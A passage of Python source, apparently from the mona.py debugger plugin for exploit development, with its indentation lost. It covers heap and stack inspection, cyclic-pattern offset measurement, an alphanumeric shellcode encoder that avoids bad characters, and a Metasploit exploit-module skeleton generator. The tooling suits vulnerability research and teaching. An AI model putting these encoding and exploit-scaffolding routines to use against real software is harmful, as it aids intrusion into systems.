byte1,byte2,byte3,byte4 = splitAddress(address)
# if the first is a null we keep the address anyway
if not (byte1 == 0 or byte1 in range):
return False
elif not byte2 in range:
return False
elif not byte3 in range:
return False
elif not byte4 in range:
return False
if arch == 64:
byte1,byte2,byte3,byte4,byte5,byte6,byte7,byte8 = splitAddress(address)
# if the first is a null we keep the address anyway
if not (byte1 == 0 or byte1 in range):
return False
elif not byte2 in range:
return False
elif not byte3 in range:
return False
elif not byte4 in range:
return False
elif not byte5 in range:
return False
elif not byte6 in range:
return False
elif not byte7 in range:
return False
elif not byte8 in range:
return False
return True
def readString(address):
"""
Reads a string from the given address until it reaches a null bytes
Arguments:
address - the base address (integer value)
Return:
the string
"""
toreturn = dbg.readString(address)
return toreturn
def getSegmentEnd(segmentstart):
os = dbg.getOsVersion()
offset = 0x24
if win7mode:
offset = 0x28
segmentend = struct.unpack('<L',dbg.readMemory(segmentstart + offset,4))[0]
return segmentend
def getHeapFlag(flag):
flags = {
0x0 : "Free",
0x1 : "Busy",
0x2 : "Extra present",
0x4 : "Fill pattern",
0x8 : "Virtallocd",
0x10 : "Last",
0x20 : "FFU-1",
0x40 : "FFU-2",
0x80 : "No Coalesce"
}
#if win7mode:
# flags[0x8] = "Internal"
if flag in flags:
return flags[flag]
else:
# maybe it's a combination of flags
values = [0x80, 0x40, 0x20, 0x10, 0x8, 0x4, 0x2, 0x1]
flagtext = []
for val in values:
if (flag - val) >= 0:
flagtext.append(flags[val])
flag -= val
if len(flagtext) == 0:
flagtext = "Unknown"
else:
flagtext = ','.join(flagtext)
return flagtext
def decodeHeapHeader(headeraddress,headersize,key):
# get header and decode first 4 bytes
blockcnt = 0
fullheaderbytes = ""
decodedheader = ""
fullheaderbytes = ""
while blockcnt < headersize:
header = struct.unpack('<L',dbg.readMemory(headeraddress+blockcnt,4))[0]
if blockcnt == 0:
decodedheader = header ^ key
else:
decodedheader = header
headerbytes = "%08x" % decodedheader
bytecnt = 7
while bytecnt >= 0:
fullheaderbytes = fullheaderbytes + headerbytes[bytecnt-1] + headerbytes[bytecnt]
bytecnt -= 2
blockcnt += 4
return hex2bin(fullheaderbytes)
def walkSegment(FirstEntry,LastValidEntry,heapbase):
"""
Finds all chunks in a given segment
Arguments : Start and End of segment, and heapbase
Returns a dictionary of MnChunk objects
Key : chunk pointer
"""
mHeap = MnHeap(heapbase)
mSegment = MnSegment(heapbase,FirstEntry,LastValidEntry)
return mSegment.getChunks()
def getStacks():
"""
Retrieves all stacks from all threads in the current application
Arguments:
None
Return:
a dictionary, with key = threadID. Each entry contains an array with base and top of the stack
"""
stacks = {}
global stacklistCache
if len(stacklistCache) > 0:
return stacklistCache
else:
threads = dbg.getAllThreads()
for thread in threads:
teb = thread.getTEB()
tid = thread.getId()
topStack = 0
baseStack = 0
if arch == 32:
topStack = struct.unpack('<L',dbg.readMemory(teb+4,4))[0]
baseStack = struct.unpack('<L',dbg.readMemory(teb+8,4))[0]
if arch == 64:
topStack = struct.unpack('<Q',dbg.readMemory(teb+8,8))[0]
baseStack = struct.unpack('<Q',dbg.readMemory(teb+16,8))[0]
stacks[tid] = [baseStack,topStack]
stacklistCache = stacks
return stacks
def meetsAccessLevel(page,accessLevel):
"""
Checks if a given page meets a given access level
Arguments:
page - a page object
accesslevel - a string containing one of the following access levels :
R,W,X,RW,RX,WR,WX,RWX or *
Return:
a boolean
"""
if "*" in accessLevel:
return True
pageAccess = page.getAccess(human=True)
if "-R" in accessLevel:
if "READ" in pageAccess:
return False
if "-W" in accessLevel:
if "WRITE" in pageAccess:
return False
if "-X" in accessLevel:
if "EXECUTE" in pageAccess:
return False
if "R" in accessLevel:
if not "READ" in pageAccess:
return False
if "W" in accessLevel:
if not "WRITE" in pageAccess:
return False
if "X" in accessLevel:
if not "EXECUTE" in pageAccess:
return False
return True
def splitToPtrInstr(input):
"""
Splits a line (retrieved from a mona output file) into a pointer and a string with the instructions in the file
Arguments:
input : the line containing pointer and instruction
Return:
a pointer - (integer value)
a string - instruction
if the input does not contain a valid line, pointer will be set to -1 and string will be empty
"""
thispointer = -1
thisinstruction = ""
split1 = re.compile(" ")
split2 = re.compile(":")
split3 = re.compile("\*\*")
thisline = input.lower()
if thisline.startswith("0x"):
#get the pointer
parts = split1.split(input)
part1 = parts[0].replace("\n","").replace("\r","")
if len(part1) != 10:
return thispointer,thisinstruction
else:
thispointer = hexStrToInt(part1)
if len(parts) > 1:
subparts = split2.split(input)
subpartsall = ""
if len(subparts) > 1:
cnt = 1
while cnt < len(subparts):
subpartsall += subparts[cnt] + ":"
cnt +=1
subsubparts = split3.split(subpartsall)
thisinstruction = subsubparts[0].strip()
return thispointer,thisinstruction
else:
return thispointer,thisinstruction
def getNrOfDictElements(thisdict):
"""
Will get the total number of entries in a given dictionary
Argument: the source dictionary
Output : an integer
"""
total = 0
for dicttype in thisdict:
for dictval in thisdict[dicttype]:
total += 1
return total
def getModuleObj(modname):
"""
Will return a module object if the provided module name exists
Will perform a case sensitive search first,
and then a case insensitive search in case nothing was found
"""
# Method 1
mod = dbg.getModule(modname)
if mod is not None:
return MnModule(modname)
# Method 2
suffixes = ["",".exe",".dll"]
allmod = dbg.getAllModules()
for suf in suffixes:
modname_search = modname + suf
#WinDBG optimized
if __DEBUGGERAPP__ == "WinDBG":
for tmod_s in allmod:
tmod = dbg.getModule(tmod_s)
if not tmod == None:
if tmod.getName() == modname_search:
return MnModule(tmod_s)
imname = dbg.getImageNameForModule(tmod.getName())
if not imname == None:
if imname == modname_search:
return MnModule(tmod)
for tmod_s in allmod:
tmod = dbg.getModule(tmod_s)
if not tmod == None:
if tmod.getName().lower() == modname_search.lower():
return MnModule(tmod_s)
imname = dbg.getImageNameForModule(tmod.getName().lower())
if not imname == None:
if imname.lower() == modname_search.lower():
return MnModule(tmod)
for tmod_s in allmod:
tmod = dbg.getModule(tmod_s)
if not tmod == None:
if tmod_s.lower() == modname_search.lower():
return MnModule(tmod_s)
else:
# Immunity
for tmod_s in allmod:
if not tmod_s == None:
mname = tmod_s.getName()
if mname == modname_search:
return MnModule(mname)
for tmod_s in allmod:
if not tmod_s == None:
mname = tmod_s.getName()
if mname.lower() == modname_search.lower():
return MnModule(mname)
return None
def getPatternLength(startptr,type="normal",args={}):
"""
Gets length of a cyclic pattern, starting from a given pointer
Arguments:
startptr - the start pointer (integer value)
type - optional string, indicating type of pattern :
"normal" : normal pattern
"unicode" : unicode pattern
"upper" : uppercase pattern
"lower" : lowercase pattern
"""
patternsize = 0
endofpattern = False
global silent
oldsilent=silent
silent=True
fullpattern = createPattern(200000,args)
silent=oldsilent
if type == "upper":
fullpattern = fullpattern.upper()
if type == "lower":
fullpattern = fullpattern.lower()
#if type == "unicode":
# fullpattern = toUnicode(fullpattern)
if type in ["normal","upper","lower","unicode"]:
previousloc = -1
while not endofpattern and patternsize <= len(fullpattern):
sizemeter=dbg.readMemory(startptr+patternsize,4)
if type == "unicode":
sizemeter=dbg.readMemory(startptr+patternsize,8)
sizemeter = sizemeter.replace('\x00','')
else:
sizemeter=dbg.readMemory(startptr+patternsize,4)
if len(sizemeter) == 4:
thisloc = fullpattern.find(sizemeter)
if thisloc < 0 or thisloc <= previousloc:
endofpattern = True
else:
patternsize += 4
previousloc = thisloc
else:
return patternsize
#maybe this is not the end yet
patternsize -= 8
endofpattern = False
while not endofpattern and patternsize <= len(fullpattern):
sizemeter=dbg.readMemory(startptr+patternsize,4)
if type == "unicode":
sizemeter=dbg.readMemory(startptr+patternsize,8)
sizemeter = sizemeter.replace('\x00','')
else:
sizemeter=dbg.readMemory(startptr+patternsize,4)
if fullpattern.find(sizemeter) < 0:
patternsize += 3
endofpattern = True
else:
patternsize += 1
if type == "unicode":
patternsize = (patternsize / 2) + 1
return patternsize
def getAPointer(modules,criteria,accesslevel):
"""
Gets the first pointer from one of the supplied module that meets a set of criteria
Arguments:
modules - array with module names
criteria - dictionary describing the criteria the pointer needs to comply with
accesslevel - the required access level
Return:
a pointer (integer value) or 0 if nothing was found
"""
pointer = 0
dbg.getMemoryPages()
for a in dbg.MemoryPages.keys():
page_start = a
page_size = dbg.MemoryPages[a].getSize()
page_end = a + page_size
#page in one of the modules ?
if meetsAccessLevel(dbg.MemoryPages[a],accesslevel):
pageptr = MnPointer(a)
thismodulename = pageptr.belongsTo()
if thismodulename != "" and thismodulename in modules:
thismod = MnModule(thismodulename)
start = thismod.moduleBase
end = thismod.moduleTop
random.seed()
for cnt in xrange(page_size+1):
#randomize the value
theoffset = random.randint(0,page_size)
thispointer = MnPointer(page_start + theoffset)
if meetsCriteria(thispointer,criteria):
return page_start + theoffset
return pointer
def haveRepetition(string, pos):
first = string[pos]
MIN_REPETITION = 3
if len(string) - pos > MIN_REPETITION:
count = 1
while ( count < MIN_REPETITION and string[pos+count] == first):
count += 1
if count >= MIN_REPETITION:
return True
return False
def findAllPaths(graph,start_vertex,end_vertex,path=[]):
path = path + [start_vertex]
if start_vertex == end_vertex:
return [path]
if start_vertex not in graph:
return []
paths = []
for vertex in graph[start_vertex]:
if vertex not in path:
extended_paths = findAllPaths(graph,vertex,end_vertex,path)
for p in extended_paths:
paths.append(p)
return paths
def isAsciiString(data):
"""
Check if a given string only contains ascii characters
"""
return all((ord(c) >= 32 and ord(c) <= 127) for c in data)
def isAscii(b):
"""
Check if a given hex byte is ascii or not
Argument : the byte
Returns : Boolean
"""
return b == 0x0a or b == 0x0d or (b >= 0x20 and b <= 0x7e)
def isAscii2(b):
"""
Check if a given hex byte is ascii or not, will not flag newline or carriage return as ascii
Argument : the byte
Returns : Boolean
"""
return b >= 0x20 and b <= 0x7e
def isHexString(input):
"""
Checks if all characters in a string are hex (0->9, a->f, A->F)
Alias for isAddress()
"""
return isAddress(input)
def extract_chunks(iterable, size):
""" Retrieves chunks of the given :size from the :iterable """
fill = object()
gen = itertools.izip_longest(fillvalue=fill, *([iter(iterable)] * size))
return (tuple(x for x in chunk if x != fill) for chunk in gen)
def rrange(x, y = 0):
""" Creates a reversed range (from x - 1 down to y).
Example:
>>> rrange(10, 0) # => [9, 8, 7, 6, 5, 4, 3, 2, 1, 0]
"""
return range(x - 1, y - 1, -1)
def getSkeletonHeader(exploittype,portnr,extension,url,badchars='\x00\x0a\x0d'):
originalauthor = "insert_name_of_person_who_discovered_the_vulnerability"
name = "insert name for the exploit"
cve = "insert CVE number here"
if url == "":
url = "<insert another link to the exploit/advisory here>"
else:
try:
# connect to url & get author + app description
u = urllib.urlretrieve(url)
# extract title
fh = open(u[0],'r')
contents = fh.readlines()
fh.close()
for line in contents:
if line.find('<h1') > -1:
titleline = line.split('>')
if len(titleline) > 1:
name = titleline[1].split('<')[0].replace("\"","").replace("'","").strip()
break
for line in contents:
if line.find('Author:') > -1 and line.find('td style') > -1:
authorline = line.split("Author:")
if len(authorline) > 1:
originalauthor = authorline[1].split('<')[0].replace("\"","").replace("'","").strip()
break
for line in contents:
if line.find('CVE:') > -1 and line.find('td style') > -1:
cveline = line.split("CVE:")
if len(cveline) > 1:
tcveparts = cveline[1].split('>')
if len(tcveparts) > 1:
tcve = tcveparts[1].split('<')[0].replace("\"","").replace("'","").strip()
if tcve.upper().strip() != "N//A":
cve = tcve
break
except:
dbg.log(" ** Unable to download %s" % url,highlight=1)
url = "<insert another link to the exploit/advisory here>"
monaConfig = MnConfig()
thisauthor = monaConfig.get("author")
if thisauthor == "":
thisauthor = "<insert your name here>"
skeletonheader = "##\n"
skeletonheader += "# This module requires Metasploit: http://metasploit.com/download\n"
skeletonheader += "# Current source: https://github.com/rapid7/metasploit-framework\n"
skeletonheader += "##\n\n"
skeletonheader += "require 'msf/core'\n\n"
skeletonheader += "class MetasploitModule < Msf::Exploit::Remote\n"
skeletonheader += " #Rank definition: http://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking\n"
skeletonheader += " #ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking\n"
skeletonheader += " Rank = NormalRanking\n\n"
if exploittype == "fileformat":
skeletonheader += " include Msf::Exploit::FILEFORMAT\n"
if exploittype == "network client (tcp)":
skeletonheader += " include Msf::Exploit::Remote::Tcp\n"
if exploittype == "network client (udp)":
skeletonheader += " include Msf::Exploit::Remote::Udp\n"
if cve.strip() == "":
cve = "<insert CVE number here>"
skeletoninit = " def initialize(info = {})\n"
skeletoninit += " super(update_info(info,\n"
skeletoninit += " 'Name' => '" + name + "',\n"
skeletoninit += " 'Description' => %q{\n"
skeletoninit += " Provide information about the vulnerability / explain as good as you can\n"
skeletoninit += " Make sure to keep each line less than 100 columns wide\n"
skeletoninit += " },\n"
skeletoninit += " 'License' => MSF_LICENSE,\n"
skeletoninit += " 'Author' =>\n"
skeletoninit += " [\n"
skeletoninit += " '" + originalauthor + "<user[at]domain.com>', # Original discovery\n"
skeletoninit += " '" + thisauthor + "', # MSF Module\n"
skeletoninit += " ],\n"
skeletoninit += " 'References' =>\n"
skeletoninit += " [\n"
skeletoninit += " [ 'OSVDB', '<insert OSVDB number here>' ],\n"
skeletoninit += " [ 'CVE', '" + cve + "' ],\n"
skeletoninit += " [ 'URL', '" + url + "' ]\n"
skeletoninit += " ],\n"
skeletoninit += " 'DefaultOptions' =>\n"
skeletoninit += " {\n"
skeletoninit += " 'ExitFunction' => 'process', #none/process/thread/seh\n"
skeletoninit += " #'InitialAutoRunScript' => 'migrate -f',\n"
skeletoninit += " },\n"
skeletoninit += " 'Platform' => 'win',\n"
skeletoninit += " 'Payload' =>\n"
skeletoninit += " {\n"
skeletoninit += " 'BadChars' => \"" + bin2hexstr(badchars) + "\", # <change if needed>\n"
skeletoninit += " 'DisableNops' => true,\n"
skeletoninit += " },\n"
skeletoninit2 = " 'Privileged' => false,\n"
skeletoninit2 += " #Correct Date Format: \"M D Y\"\n"
skeletoninit2 += " #Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec\n"
skeletoninit2 += " 'DisclosureDate' => 'MONTH DAY YEAR',\n"
skeletoninit2 += " 'DefaultTarget' => 0))\n"
if exploittype.find("network") > -1:
skeletoninit2 += "\n register_options([Opt::RPORT(" + str(portnr) + ")], self.class)\n"
if exploittype.find("fileformat") > -1:
skeletoninit2 += "\n register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf" + extension + "']),], self.class)\n"
skeletoninit2 += "\n end\n\n"
return skeletonheader,skeletoninit,skeletoninit2
def archValue(x86, x64):
if arch == 32:
return x86
elif arch == 64:
return x64
def readPtrSizeBytes(ptr):
if arch == 32:
return struct.unpack('<L',dbg.readMemory(ptr,4))[0]
elif arch == 64:
return struct.unpack('<Q',dbg.readMemory(ptr,8))[0]
def getOsOffset(name):
osrelease = dbg.getOsRelease()
osreleaseparts = osrelease.split(".")
major = int(osreleaseparts[0])
minor = int(osreleaseparts[1])
build = int(osreleaseparts[2])
offset_category = "xp"
if major == 6 and minor == 0:
offset_category = "vista"
elif major == 6 and minor == 1:
offset_category = "win7"
elif major == 6 and minor in [2, 3]:
offset_category = "win8"
elif major == 10 and minor == 0:
offset_category = "win10"
offset_category_index = offset_categories.index(offset_category)
offset = 0
curr_category = "xp"
for c in offset_categories:
if not c in offsets[name]:
continue
if offset_categories.index(c) > offset_category_index:
break
curr_category = c
if curr_category != "win10":
offset = offsets[name][c]
else:
win10offsets = offsets[name][c]
for o in sorted(win10offsets):
if o > build:
break
curr_build = o
offset = win10offsets[o]
return archValue(offset[0], offset[1])
#---------------------------------------#
# Class to call commands & parse args #
#---------------------------------------#
class MnCommand:
"""
Class to call commands, show usage and parse arguments
"""
def __init__(self, name, description, usage, parseProc, alias=""):
self.name = name
self.description = description
self.usage = usage
self.parseProc = parseProc
self.alias = alias
#---------------------------------------#
# Class to encode bytes #
#---------------------------------------#
class MnEncoder:
"""
Class to encode bytes
"""
def __init__(self,bytestoencode):
self.origbytestoencode = bytestoencode
self.bytestoencode = bytestoencode
def encodeAlphaNum(self,badchars = []):
encodedbytes = {}
if not silent:
dbg.log("[+] Using alphanum encoder")
dbg.log("[+] Received %d bytes to encode" % len(self.origbytestoencode))
dbg.log("[+] Nr of bad chars: %d" % len(badchars))
# first, check if there are no bad char conflicts
nobadchars = "\x25\x2a\x2d\x31\x32\x35\x4a\x4d\x4e\x50\x55"
badbadchars = False
for b in badchars:
if b in nobadchars:
dbg.log("*** Error: byte \\x%s cannot be a bad char with this encoder" % bin2hex(b))
badbadchars = True
if badbadchars:
return {}
# if all is well, explode the input to a multiple of 4
while True:
moduloresult = len(self.bytestoencode) % 4
if moduloresult == 0:
break
else:
self.bytestoencode += '\x90'
if not len(self.bytestoencode) == len(self.origbytestoencode):
if not silent:
dbg.log("[+] Added %d nops to make length of input a multiple of 4" % (len(self.bytestoencode) - len(self.origbytestoencode)))
# break it down into chunks of 4 bytes
toencodearray = []
toencodearray = [self.bytestoencode[max(i-4,0):i] for i in range(len(self.bytestoencode), 0, -4)][::-1]
blockcnt = 1
encodedline = 0
# we have to push the blocks in reverse order
blockcnt = len(toencodearray)
nrblocks = len(toencodearray)
while blockcnt > 0:
if not silent:
dbg.log("[+] Processing block %d/%d" % (blockcnt,nrblocks))
encodedbytes[encodedline] = ["\x25\x4a\x4d\x4e\x55","AND EAX,0x554E4D4A"]
encodedline += 1
encodedbytes[encodedline] = ["\x25\x35\x32\x31\x2A","AND EAX,0x2A313235"]
encodedline += 1
opcodes=[]
startpos=7
source = "".join(bin2hex(a) for a in toencodearray[blockcnt-1])
origbytes=source[startpos-7]+source[startpos-6]+source[startpos-5]+source[startpos-4]+source[startpos-3]+source[startpos-2]+source[startpos-1]+source[startpos]
reversebytes=origbytes[6]+origbytes[7]+origbytes[4]+origbytes[5]+origbytes[2]+origbytes[3]+origbytes[0]+origbytes[1]
revval=hexStrToInt(reversebytes)
twoval=4294967296-revval
twobytes=toHex(twoval)
if not silent:
dbg.log("Opcode to produce : %s%s %s%s %s%s %s%s" % (origbytes[0],origbytes[1],origbytes[2],origbytes[3],origbytes[4],origbytes[5],origbytes[6],origbytes[7]))
dbg.log(" reversed : %s%s %s%s %s%s %s%s" % (reversebytes[0],reversebytes[1],reversebytes[2],reversebytes[3],reversebytes[4],reversebytes[5],reversebytes[6],reversebytes[7]))
dbg.log(" -----------")
dbg.log(" 2's complement : %s%s %s%s %s%s %s%s" % (twobytes[0],twobytes[1],twobytes[2],twobytes[3],twobytes[4],twobytes[5],twobytes[6],twobytes[7]))
#for each byte, start with last one first
bcnt=3
overflow=0
while bcnt >= 0:
currbyte=twobytes[(bcnt*2)]+twobytes[(bcnt*2)+1]
currval=hexStrToInt(currbyte)-overflow
testval=currval/3
if testval < 32:
#put 1 in front of byte
currbyte="1"+currbyte
currval=hexStrToInt(currbyte)-overflow
overflow=1
else:
overflow=0
val1=currval/3
val2=currval/3
val3=currval/3
sumval=val1+val2+val3
if sumval < currval:
val3 = val3 + (currval-sumval)
#validate / fix badchars
fixvals=self.validatebadchars_enc(val1,val2,val3,badchars)
val1="%02x" % fixvals[0]
val2="%02x" % fixvals[1]
val3="%02x" % fixvals[2]
opcodes.append(val1)
opcodes.append(val2)
opcodes.append(val3)
bcnt=bcnt-1
# we should now have 12 bytes in opcodes
if not silent:
dbg.log(" -----------")
dbg.log(" %s %s %s %s" % (opcodes[9],opcodes[6],opcodes[3],opcodes[0]))
dbg.log(" %s %s %s %s" % (opcodes[10],opcodes[7],opcodes[4],opcodes[1]))
dbg.log(" %s %s %s %s" % (opcodes[11],opcodes[8],opcodes[5],opcodes[2]))
dbg.log("")
thisencodedbyte = "\x2D"
thisencodedbyte += hex2bin("\\x%s" % opcodes[0])
thisencodedbyte += hex2bin("\\x%s" % opcodes[3])
thisencodedbyte += hex2bin("\\x%s" % opcodes[6])
thisencodedbyte += hex2bin("\\x%s" % opcodes[9])
encodedbytes[encodedline] = [thisencodedbyte,"SUB EAX,0x%s%s%s%s" % (opcodes[9],opcodes[6],opcodes[3],opcodes[0])]
encodedline += 1
thisencodedbyte = "\x2D"
thisencodedbyte += hex2bin("\\x%s" % opcodes[1])
thisencodedbyte += hex2bin("\\x%s" % opcodes[4])
thisencodedbyte += hex2bin("\\x%s" % opcodes[7])
thisencodedbyte += hex2bin("\\x%s" % opcodes[10])
encodedbytes[encodedline] = [thisencodedbyte,"SUB EAX,0x%s%s%s%s" % (opcodes[10],opcodes[7],opcodes[4],opcodes[1])]
encodedline += 1
thisencodedbyte = "\x2D"
thisencodedbyte += hex2bin("\\x%s" % opcodes[2])
thisencodedbyte += hex2bin("\\x%s" % opcodes[5])
thisencodedbyte += hex2bin("\\x%s" % opcodes[8])
thisencodedbyte += hex2bin("\\x%s" % opcodes[11])
encodedbytes[encodedline] = [thisencodedbyte,"SUB EAX,0x%s%s%s%s" % (opcodes[11],opcodes[8],opcodes[5],opcodes[2])]
encodedline += 1
encodedbytes[encodedline] = ["\x50","PUSH EAX"]
encodedline += 1
blockcnt -= 1
return encodedbytes
def validatebadchars_enc(self,val1,val2,val3,badchars):
newvals=[]
allok=0
giveup=0
type=0
origval1=val1
origval2=val2
origval3=val3
d1=0
d2=0
d3=0
lastd1=0
lastd2=0
lastd3=0
while allok==0 and giveup==0:
#check if there are bad chars left
charcnt=0
val1ok=1
val2ok=1
val3ok=1
while charcnt < len(badchars):
if (hex2bin("%02x" % val1) in badchars):
val1ok=0
if (hex2bin("%02x" % val2) in badchars):
val2ok=0
if (hex2bin("%02x" % val3) in badchars):
val3ok=0
charcnt=charcnt+1
if (val1ok==0) or (val2ok==0) or (val3ok==0):
allok=0
else:
allok=1
if allok==0:
#try first by sub 1 from val1 and val2, and add more to val3
if type==0:
val1=val1-1
val2=val2-1
val3=val3+2
if (val1<1) or (val2==0) or (val3 > 126):
val1=origval1
val2=origval2
val3=origval3
type=1
if type==1:
#then try by add 1 to val1 and val2, and sub more from val3
val1=val1+1
val2=val2+1
val3=val3-2
if (val1>126) or (val2>126) or (val3 < 1):
val1=origval1
val2=origval2
val3=origval3
type=2
if type==2:
#try by sub 2 from val1, and add 1 to val2 and val3
val1=val1-2
val2=val2+1
val3=val3+1
if (val1<1) or (val2>126) or (val3 > 126):
val1=origval1
val2=origval2
val3=origval3
type=3
if type==3:
#try by add 2 to val1, and sub 1 from val2 and val3
val1=val1+2
val2=val2-1
val3=val3-1
if (val1 > 126) or (val2 < 1) or (val3 < 1):
val1=origval1
val2=origval2
val3=origval3
type=4
if type==4:
if (val1ok==0):
val1=val1-1
d1=d1+1
else:
#now spread delta over other 2 values
if (d1 > 0):
val2=val2+1
val3=origval3+d1-1
d1=d1-1
else:
val1=0
if (val1 < 1) or (val2 > 126) or (val3 > 126):
val1=origval1
val2=origval2
val3=origval3
d1=0
type=5
if type==5:
if (val1ok==0):
val1=val1+1
d1=d1+1
else:
#now spread delta over other 2 values
if (d1 > 0):
val2=val2-1
val3=origval3-d1+1
d1=d1-1
else:
val1=255
if (val1>126) or (val2 < 1) or (val3 < 1):
val1=origval1
val2=origval2
val3=origval3
val1ok=0
val2ok=0
val3ok=0
d1=0
d2=0
d3=0
type=6
if type==6:
if (val1ok==0):
val1=val1-1
#d1=d1+1
if (val2ok==0):
val2=val2+1
#d2=d2+1
d3=origval1-val1+origval2-val2
val3=origval3+d3
if (lastd3==d3) and (d3 > 0):
val1=origval1
val2=origval2
val3=origval3
giveup=1
else:
lastd3=d3
if (val1<1) or (val2 < 1) or (val3 > 126):
val1=origval1
val2=origval2
val3=origval3
giveup=1
#check results
charcnt=0
val1ok=1
val2ok=1
val3ok=1
val1text="OK"
val2text="OK"
val3text="OK"
while charcnt < len(badchars):
if (val1 == badchars[charcnt]):
val1ok=0
val1text="NOK"
if (val2 == badchars[charcnt]):
val2ok=0
val2text="NOK"
if (val3 == badchars[charcnt]):
val3ok=0
val3text="NOK"
charcnt=charcnt+1
if (val1ok==0) or (val2ok==0) or (val3ok==0):
dbg.log(" ** Unable to fix bad char issue !",highlight=1)
dbg.log(" -> Values to check : %s(%s) %s(%s) %s(%s) " % (bin2hex(origval1),val1text,bin2hex(origval2),val2text,bin2hex(origval3),val3text),highlight=1)
val1=origval1
val2=origval2
val3=origval3
newvals.append(val1)
newvals.append(val2)
newvals.append(val3)
return newvals
#---------------------------------------#
# Class to perform call tracing #
#---------------------------------------#
class MnCallTraceHook(LogBpHook):
def __init__(self, callptr, showargs, instruction, logfile):
LogBpHook.__init__(self)
self.callptr = callptr
self.showargs = showargs
self.logfile = logfile
self.instruction = instruction
def run(self,regs):
# get instruction at this address
thisaddress = regs["EIP"]
thisinstruction = self.instruction
allargs = []
argstr = ""
if thisinstruction.startswith("CALL "):
if self.showargs > 0:
for cnt in xrange(self.showargs):
thisarg = 0
try:
thisarg = struct.unpack('<L',dbg.readMemory(regs["ESP"]+(cnt*4),4))[0]
except:
thisarg = 0
allargs.append(thisarg)
argstr += "0x%08x, " % thisarg
argstr = argstr.strip(" ")
argstr = argstr.strip(",")
#dbg.log("CallTrace : 0x%08x : %s (%s)" % (thisaddress,thisinstruction,argstr),address = thisaddress)
#else:
#dbg.log("CallTrace : 0x%08x : %s" % (thisaddress,thisinstruction), address = thisaddress)
# save to file
try:
FILE=open(self.logfile,"a")
textra = ""
for treg in dbglib.Registers32BitsOrder:
if thisinstruction.lower().find(treg.lower()) > -1:
textra += "%s = 0x%08x, " % (treg,regs[treg])
if textra != "":
textra = textra.strip(" ")
textra = textra.strip(",")
textra = "(" + textra + ")"
FILE.write("0x%08x : %s %s\n" % (thisaddress, thisinstruction, textra))
if self.showargs > 0:
cnt = 0
while cnt < len(allargs):
content = ""
try:
bytecontent = dbg.readMemory(allargs[cnt],16)
content = bin2hex(bytecontent)
except:
content = ""
FILE.write(" Arg%d at 0x%08x : 0x%08x : %s\n" % (cnt,regs["ESP"]+(cnt*4),allargs[cnt],content))
cnt += 1
FILE.close()
except:
#dbg.log("OOPS", highlight=1)
pass
if thisinstruction.startswith("RETN"):
returnto = 0
try:
returnto = struct.unpack('<L',dbg.readMemory(regs["ESP"],4))[0]
except:
returnto = 0
#dbg.log("ReturnTrace : 0x%08x : %s - Return To 0x%08x" % (thisaddress,thisinstruction,returnto), address = thisaddress)
try:
FILE=open(self.logfile,"a")
FILE.write("0x%08x : %s \n" % (thisaddress, thisinstruction))
FILE.write(" ReturnTo at 0x%08x : 0x%08x\n" % (regs["ESP"],returnto))
FILE.write(" EAX : 0x%08x\n" % regs["EAX"])
FILE.close()
except:
pass
#---------------------------------------#
# Class to set deferred BP Hooks #
#---------------------------------------#
class MnDeferredHook(LogBpHook):
def __init__(self, loadlibraryptr, targetptr):
LogBpHook.__init__(self)
self.targetptr = targetptr
self.loadlibraryptr = loadlibraryptr
def run(self,regs):
#dbg.log("0x%08x - DLL Loaded, checking for %s" % (self.loadlibraryptr,self.targetptr), highlight=1)
dbg.pause()
if self.targetptr.find(".") > -1:
# function name, try to resolve
functionaddress = dbg.getAddress(self.targetptr)
if functionaddress > 0:
dbg.log("Deferred Breakpoint set at %s (0x%08x)" % (self.targetptr,functionaddress),highlight=1)
dbg.setBreakpoint(functionaddress)
self.UnHook()
dbg.log("Hook removed")
dbg.run()
return
if self.targetptr.find("+") > -1:
ptrparts = self.targetptr.split("+")
modname = ptrparts[0]
if not modname.lower().endswith(".dll"):
modname += ".dll"
themodule = getModuleObj(modname)
if themodule != None and len(ptrparts) > 1:
address = themodule.getBase() + int(ptrparts[1],16)
if address > 0:
dbg.log("Deferred Breakpoint set at %s (0x%08x)" % (self.targetptr,address),highlight=1)
dbg.setBreakpoint(address)
self.UnHook()
dbg.log("Hook removed")
dbg.run()
return
if self.targetptr.find("+") == -1 and self.targetptr.find(".") == -1:
address = int(self.targetptr,16)
thispage = dbg.getMemoryPageByAddress(address)
if thispage != None:
dbg.setBreakpoint(address)
dbg.log("Deferred Breakpoint set at 0x%08x" % address, highlight=1)
self.UnHook()
dbg.log("Hook removed")
dbg.run()
#---------------------------------------#
# Class to access config file #
#---------------------------------------#
class MnConfig:
"""
Class to perform config file operations
"""
def __init__(self):
self.configfile = "mona.ini"
self.currpath = os.path.dirname(os.path.realpath(self.configfile))
# first check if we will be saving the file into Immunity folder
if __DEBUGGERAPP__ == "Immunity Debugger":
if not os.path.exists(os.path.join(self.currpath,"immunitydebugger.exe")):
dbg.log(" ** Warning: using mona.ini file from %s" % self.currpath)
def get(self,parameter):
"""
Retrieves the contents of a given parameter from the config file
or from memory if the config file has been read already
(configFileCache)
Arguments:
parameter - the name of the parameter
Return:
A string, containing the contents of that parameter
"""
#read config file
#format : parameter=value
toreturn = ""
curparam=[]
global configFileCache
#first check if parameter already exists in global cache
if parameter.strip().lower() in configFileCache:
toreturn = configFileCache[parameter.strip().lower()]
#dbg.log("Found parameter %s in cache: %s" % (parameter, toreturn))
else:
if os.path.exists(self.configfile):
try:
configfileobj = open(self.configfile,"rb")
content = configfileobj.readlines()
configfileobj.close()
for thisLine in content:
if not thisLine[0] == "#":
currparam = thisLine.split('=')
if currparam[0].strip().lower() == parameter.strip().lower() and len(currparam) > 1:
#get value
currvalue = ""
i=1
while i < len(currparam):
currvalue = currvalue + currparam[i] + "="
i += 1
toreturn = currvalue.rstrip("=").replace('\n','').replace('\r','')
# drop into global cache for next time
configFileCache[parameter.strip().lower()] = toreturn
#dbg.log("Read parameter %s from file: %s" % (parameter, toreturn))
except:
toreturn=""
return toreturn
def set(self,parameter,paramvalue):
"""
Sets/Overwrites the contents of a given parameter in the config file
Arguments:
parameter - the name of the parameter
paramvalue - the new value of the parameter
Return:
nothing
"""
global configFileCache
configFileCache[parameter.strip().lower()] = paramvalue
if os.path.exists(self.configfile):
#modify file
try:
configfileobj = open(self.configfile,"r")
content = configfileobj.readlines()
configfileobj.close()
newcontent = []
